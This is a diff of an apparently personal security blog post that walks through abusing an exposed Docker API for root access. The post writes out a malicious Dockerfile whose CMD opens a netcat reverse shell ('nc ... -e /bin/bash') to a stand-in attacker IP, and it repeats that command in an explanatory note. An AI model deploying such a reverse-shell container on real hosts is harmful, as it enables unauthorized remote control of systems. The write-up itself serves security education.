fusionx3/fusionx3.github.io/_posts/2017-10-09-Escalation-From-Docker-To-Root-Access.md

 After some quick reading through the [Docker API Documentation](https://docs.docker.com/engine/api/v1.24/), creating a custom image and starting it as a container is simply a matter of a few POST requests.

 Since Docker allows us to create an image from a _Dockerfile_ through the UNIX socket, it shouldn't be different if performed through the API, right?
 We begin to craft our own malicious _Dockerfile_ and upload it anywhere on the internet.
-The Dockerfile I created utilized a clean Ubuntu installation and the good ol' netcat to give us a reverse TCP shell with root access to the container.
+The Dockerfile I created utilized a clean Ubuntu installation and the good ol' [**netcat**](http://netcat.sourceforge.net/) to give us a reverse TCP shell with root access to the container.
 Our _Dockerfile_ should look like this:

 ```docker
 FROM ubuntu:16.04

 RUN apt-get update -y && apt-get install netcat -y
 CMD ["nc", "-n", "My_OWN_IP", "4444", "-e", "/bin/bash"]
 ```

+Note
+> CMD is the command that is to executed upon the startup of the container.
+In our case, it's just like running `nc -n xx.xx.xx.xx 444 -e /bin/bash` in the container system.

 Afterwards, we start to craft the POST request and the JSON object needed in order to build our image.